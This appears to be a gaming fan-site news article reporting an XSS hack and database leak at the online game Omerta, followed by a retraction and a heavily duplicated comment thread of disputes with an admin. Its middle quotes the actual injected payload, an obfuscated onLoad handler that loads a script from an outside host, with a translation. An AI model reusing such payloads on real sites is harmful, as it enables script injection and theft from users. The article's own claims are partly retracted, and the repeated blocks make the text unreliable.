» Menu
» OB/Site News
» Articles
» Barafranca News
 |
|
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.
Barafranca News: Connection problems - fixed
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Barafranca News: Connection problems - fixed
By Brando: There was a hardware problem which was solved by switching that machine off.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)
Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Anonymous at 06:08:35 on 23/09:
Eh? I found myself on that list back then and I can say the list was correct, like bullets amount. was few days old data but correct so? Omerta = FUBAR!!!!
Brando - rly at 02:01:16 on 23/09:
You people really believe everything you read?
Look out! NIBIRU!!!!!
Anonymous at 20:24:13 on 22/09:
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
You people really believe everything you read?
Look out! NIBIRU!!!!!
Anonymous (08:42:59 - 23-09)
Brando - rly at 05:22:18 on 23/09:
Sbanks email me.
I want a word.
You know my mail and if you don't you can get it by asking in #help
You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.
This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.
I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.
Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.
Short version: Fail, 'News'-hack.
There: Now you *know* it is *me*
:@
Sbanks email me.
I want a word.
You know my mail and if you don't you can get it by asking in #help
You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.
This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.
I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.
Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.
Short version: Fail, 'News'-hack.
There: Now you *know* it is *me*
:@
LOL this coming from an admin of the game :') yeah real nice image Brando you already dont give a fuck what players think and what ...and now you are abusing them ? ;') think you better take a good look at who the fuck is the iones paying for dc's and other bullshit whilst this game is still going to hell
you've lied before i no doubt expect it to be a lie again :w its almost getting to last straw here for me
Anonymous (06:08:35 - 23-09)
Brando - rly at 02:01:16 on 23/09:
You people really believe everything you read?
Look out! NIBIRU!!!!!
Anonymous at 20:24:13 on 22/09:
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
You people really believe everything you read?
Look out! NIBIRU!!!!!
Brando - rly (05:22:18 - 23-09)
Sbanks email me.
I want a word.
You know my mail and if you don't you can get it by asking in #help
You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.
This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.
I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.
Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.
Short version: Fail, 'News'-hack.
There: Now you *know* it is *me*
:@
I want a word.
You know my mail and if you don't you can get it by asking in #help
You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.
This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.
I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.
Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.
Short version: Fail, 'News'-hack.
There: Now you *know* it is *me*
:@
Brando - rly (02:02:50 - 23-09)
And that is all I can be bothered to react to. UTTER AND TOTAL NONSENSE.
Fact: Fewer babies are born in Europe than 10 years ago
Fact: Stork populations are declining in Europe
NOT Fact: Storks MUST bring babies then...
*Give me a break*...
Fact: Fewer babies are born in Europe than 10 years ago
Fact: Stork populations are declining in Europe
NOT Fact: Storks MUST bring babies then...
*Give me a break*...
Brando - rly (02:01:16 - 23-09)
Anonymous at 20:24:13 on 22/09:
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
You people really believe everything you read?
Look out! NIBIRU!!!!!
Brando - rly (02:00:35 - 23-09)
Anonymous at 20:41:45 on 22/09:
so this means reset whitin 1 week i quess
so this means reset whitin 1 week i quess
Nope seeing as no damage was done.
Brando - rly (02:00:17 - 23-09)
Kyra at 20:44:17 on 22/09:
haha didnt meant you, was rhetorical question, meant admins :P
Anonymous at 20:38:58 on 22/09:
im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd
Kyra at 20:36:02 on 22/09:
how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
Anonymous at 20:19:46 on 22/09:
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd
haha didnt meant you, was rhetorical question, meant admins :P
The whole article is rubbish and 100% made up. This is about 3 totally unconnected events.
Brando - rly (01:59:19 - 23-09)
Anonymous at 20:54:19 on 22/09:
I lol'd very hard what a non sense
I lol'd very hard what a non sense
Correct.
Brando - rly (01:58:58 - 23-09)
Mcgee at 21:38:27 on 22/09:
So I was right, and Brando lied to me.... once again.
Nothing new really.
Well I have a soldier account with no bullets so I should shut the fuck up, but yeah man I was right!!!
Knew it was shady jamook buisness....
Congrats with the hijack by the way, you must be arch angels tweaking hell.
So I was right, and Brando lied to me.... once again.
Nothing new really.
Well I have a soldier account with no bullets so I should shut the fuck up, but yeah man I was right!!!
Knew it was shady jamook buisness....
Congrats with the hijack by the way, you must be arch angels tweaking hell.
Rubbish.
Brando - rly (01:58:29 - 23-09)
Sbanks come and interview me about this. You made this up... combining issues which are totally unconnected.
This is the biggest pile of crap I ever read!
Come interview me for the truth - I thought you had better journalistic standards.
This is like reject clippings from a bad X-files script.
Steve
This is the biggest pile of crap I ever read!
Come interview me for the truth - I thought you had better journalistic standards.
This is like reject clippings from a bad X-files script.
Steve
So I was right, and Brando lied to me.... once again.
Nothing new really.
Well I have a soldier account with no bullets so I should shut the fuck up, but yeah man I was right!!!
Knew it was shady jamook buisness....
Congrats with the hijack by the way, you must be arch angels tweaking hell.
Nothing new really.
Well I have a soldier account with no bullets so I should shut the fuck up, but yeah man I was right!!!
Knew it was shady jamook buisness....
Congrats with the hijack by the way, you must be arch angels tweaking hell.
Anonymous (20:54:19 - 22-09)
I lol'd very hard what a non sense
Anonymous at 20:38:58 on 22/09:
im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd
Kyra at 20:36:02 on 22/09:
how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
Anonymous at 20:19:46 on 22/09:
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd
haha didnt meant you, was rhetorical question, meant admins :P
Anonymous (20:41:45 - 22-09)
so this means reset whitin 1 week i quess
Anonymous (20:38:58 - 22-09)
Kyra at 20:36:02 on 22/09:
how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
Anonymous at 20:19:46 on 22/09:
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
im not that stupid Kyra :P but maybe this is there thinking im saying not mine xd
Anonymous at 20:19:46 on 22/09:
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
how can you be stupid enough to believe they wont come out and say what they did, that i dont understand :p
Anonymous (20:24:13 - 22-09)
Omerta hacked - again. They just don't learn. I remember the last 1, found all the bullets etc. from a list that was posted on public. And surprise, back then all images was disabled...kredu had "something" to with that back then :o
Anonymous (20:19:46 - 22-09)
Kyra at 20:15:23 on 22/09:
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
I dont understand why they tried a cover up.. they actually thought who ever hacked them wont come and say he did?
It only made stuff worse, hiding a fact like that, specially since they also got all our private data!
because deep down they know there killing the game with or without hacking.. and if they tell all this they may lose there precious lackey consumers :r
Sbanks email me.
I want a word.
You know my mail and if you don't you can get it by asking in #help
You are a disreputable scoundrel and a peddler of unsubstantiated and ill-conceived and pointless propaganda.
This nonsense you made up was either born in peyote, vodka or glue and bears as little semblance to the 'truth' as all these dick-headed rants about *NIBIRU* etc.
I had understood you to be a reasonably objective journalist, if a little knock-kneed when taking in interview.
Now I see you for what you are: A liar and a printer of malicious and bogus tittle-tattle.
Short version: Fail, 'News'-hack.
There: Now you *know* it is *me*
:@
Normally we would remove posts like these for the name calling by the way.